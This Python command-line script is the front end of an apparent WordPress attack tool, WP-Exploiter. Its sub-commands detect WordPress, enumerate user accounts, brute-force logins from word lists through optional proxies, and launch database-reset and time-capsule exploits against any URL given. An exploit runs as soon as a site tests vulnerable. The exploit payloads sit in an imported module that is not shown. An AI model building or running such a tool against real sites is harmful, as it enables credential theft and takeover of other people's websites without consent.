#!/usr/bin/python3
import click
from wordpress import WPEnumerator, WPPassBruteforcer, WPDatabaseResetExploiter, WPTimeCapsuleExploiter, WPDetector
# Module-level defaults. Neither value is referenced by the commands visible in
# this file. NOTE(review): presumably consumed by the exploiter classes; confirm.
DEFAULT_TIMEZONE = "Israel"
DEFAULT_FILES_GLOB_LIST = [
    "cleaning_algorithm-*.log",
    "*.dump",
]
@click.group()
def cli():
    # Root command group: it does no work itself and only dispatches to the
    # sub-commands registered on it with cli.add_command().
    # Documented with comments rather than a docstring because click would
    # surface a docstring as the group's --help text.
    return None
@click.command(help="This command using to enumerate WordPress System users if possible.")
@click.option('-u', '--url', required=True,
              help='Full url you wish to scan, for example: https://example.com')
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('--minid', type=int, help='Start enumerate from this user id')
@click.option('--maxid', type=int, help='Finish enumerate with this user id')
def enumerate(url, proxy, minid, maxid):
    """Run WPEnumerator against ``url`` and print the user data it collected.

    Note that this command function shadows the builtin ``enumerate`` for the
    rest of the module; the name is also the CLI sub-command name.

    Args:
        url: Target site URL, passed unchanged to WPEnumerator.
        proxy: Optional proxy address; when given it is used for both the
            ``http`` and ``https`` entries of the proxies mapping.
        minid: First user id of the range (None when the option is omitted).
        maxid: Last user id of the range (None when the option is omitted).
    """
    proxies = None if proxy is None else {'http': proxy, 'https': proxy}

    enumerator = WPEnumerator(url)
    found = enumerator.enumerate(minid, maxid, proxies)

    print(" ======== SUMMARY ========")
    if not found:
        print("{} enumeration is not possible for this url.".format(url))
    else:
        users = enumerator.get_users_data()
        print("Data: {}".format(users))
    print("Done.")
@click.command(
    help="This command using to detect if website is running WordPress System, Provide also the version if possible.")
@click.option('-u', '--url', required=True,
              help='Full url you wish to scan, for example: https://example.com')
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('-to', '--timeout', type=int,
              help='Maximum timeout for each http request (msecs, only integer)')
def detect(url, proxy, timeout):
    """Report whether ``url`` runs WordPress and, if so, the detected version.

    Args:
        url: Target site URL, passed unchanged to WPDetector.
        proxy: Optional proxy address; when given it is used for both the
            ``http`` and ``https`` entries of the proxies mapping.
        timeout: Per-request timeout, forwarded unchanged to WPDetector.
            NOTE(review): the option help states milliseconds; confirm the
            unit WPDetector actually expects.
    """
    proxies = None if proxy is None else {'http': proxy, 'https': proxy}

    detector = WPDetector(url, proxies=proxies, timeout=timeout)
    is_wp = detector.detect()

    # NOTE(review): the version is taken from a second detect() call that is
    # handed the URL; confirm this is the intended version lookup.
    version = detector.detect(url) if is_wp else "Unknown"

    print(" ======== SUMMARY ========")
    if not is_wp:
        print("{} is NOT WordPress System.".format(url))
    else:
        print("{} is WordPress System, running version {}".format(url, version))
    print("Done.")
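@click.command(help="This command using to print the readme file.")
def readme():
    """Print the project URL, then the contents of ``README.md``.

    The file is looked up relative to the current working directory. If it
    cannot be opened or read, the error and a pointer to the online
    repository are printed instead.
    """
    print("GIT: https://github.com/eliranmaman/WP-Exploiter")
    try:
        # Explicit encoding with errors='replace' so a non-default locale or a
        # stray byte cannot abort the listing.
        with open('README.md', 'r', encoding='utf-8', errors='replace') as file:
            for line in file:
                # Each line already ends with its own newline; suppress
                # print's terminator so the output is not double-spaced.
                print(line, end='')
    except OSError as e:
        # Only I/O failures are handled here; KeyboardInterrupt and SystemExit
        # propagate instead of being reported as a missing README.
        print(e)
        print("Could not read README file, please visit: https://github.com/eliranmaman/WP-Exploiter")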
@click.command(
    help="This command using to bruteforcing the WordPress login system, if possible.")
@click.option('-u', '--url', required=True,
              help='Full url you wish to scan, for example: https://example.com')
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('-un', '--usernames', type=str, required=True,
              help='PAth to file containing usernames, each username separate line.')
@click.option('-pass', 'passwords', required=True,
              help='path to file containing passwords, each password separate line.')
@click.option('-t', '--threads', type=int, default=1,
              help='Num of threads to use, default is 1')
def bruteforce(url, proxy, usernames, passwords, threads):
    """Run WPPassBruteforcer with the given word lists and print its result.

    The word-list files are only opened when ``is_method_possible()`` returns
    a truthy value. The result is printed to stdout as-is.

    Args:
        url: Target site URL, passed unchanged to WPPassBruteforcer.
        proxy: Optional proxy address; when given it is used for both the
            ``http`` and ``https`` entries of the proxies mapping.
        usernames: Path to a text file with one username per line.
        passwords: Path to a text file with one password per line.
        threads: Thread count forwarded to ``bruteforce()``.
    """
    proxies = None if proxy is None else {'http': proxy, 'https': proxy}

    bf = WPPassBruteforcer(url, proxies=proxies)
    is_bf_possible = bf.is_method_possible()

    data = {}
    if is_bf_possible:
        # readlines() returns every line including its line terminator.
        with open(usernames, 'r') as user_file:
            user_lines = user_file.readlines()
        with open(passwords, 'r') as password_file:
            password_lines = password_file.readlines()
        # NOTE(review): this call receives the raw --proxy string, whereas the
        # constructor above received the http/https mapping; confirm which
        # form the callee expects.
        data = bf.bruteforce(user_lines, password_lines, proxies=proxy, threads=threads)

    print(" ======== SUMMARY ========")
    if not is_bf_possible:
        print("Bruteforce is not an option for this url {}".format(url))
    else:
        print("Cracked data: {}".format(data))
    print("Done.")
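@click.command(
    help="Check the target for the selected vulnerability and run the matching exploiter(s).")
@click.option('-u', '--url', help='Full url you wish to exploite, for example: https://example.com', required=True)
@click.option('-p', '--proxy', help='If you wish to use proxy provide the ip / url.')
@click.option('-ex', '--type', help='The exploit you want to try [all, time-capsule, database-reset]', type=str,
              required=True)
def exploit(url, proxy, type):
    """Run the selected exploiter(s) against ``url``.

    For each selected exploiter, ``is_vulnerable()`` is called first and
    ``exploit()`` follows immediately when it returns a truthy value; this
    wrapper has no confirmation prompt or dry-run step in between.

    Args:
        url: Target site URL, passed unchanged to the exploiter classes.
        proxy: Optional proxy address; passed as an http/https mapping to
            WPDatabaseResetExploiter only. WPTimeCapsuleExploiter is built
            from the URL alone.
        type: One of ``all``, ``time-capsule`` or ``database-reset``. The name
            shadows the builtin inside this function but is fixed by the
            ``--type`` option.

    Raises:
        SystemExit: With status 1 when ``type`` is not a known choice, so
            that callers and scripts can tell the failure from a normal run.
    """
    if type not in ('all', 'time-capsule', 'database-reset'):
        print("Unknown exploit {}, please choose from [all, time-capsule, database-reset]".format(type))
        # Non-zero status: a bare SystemExit would report success to the shell.
        raise SystemExit(1)

    proxies = None if proxy is None else {'http': proxy, 'https': proxy}

    if type in ('all', 'database-reset'):
        exploiter = WPDatabaseResetExploiter(url, proxies=proxies)
        if exploiter.is_vulnerable():
            # if exploit_data is None => the exploit will register new user.
            exploiter.exploit()
        else:
            print("# Exploit via WPDatabaseResetExploiter is not possible for this site.")

    if type in ('all', 'time-capsule'):
        exploiter = WPTimeCapsuleExploiter(url)
        if exploiter.is_vulnerable():
            exploiter.exploit()
        else:
            print("# Exploit via WPTimeCapsuleExploiter is not possible for this site.")

    print("Done.")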
# Attach every sub-command to the root group, in the original registration order.
for _command in (detect, readme, enumerate, bruteforce, exploit):
    cli.add_command(_command)
del _command  # keep the loop variable out of the module namespace
def main():
    """Entry point: hand control to the click command group."""
    cli()
# Start the CLI only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()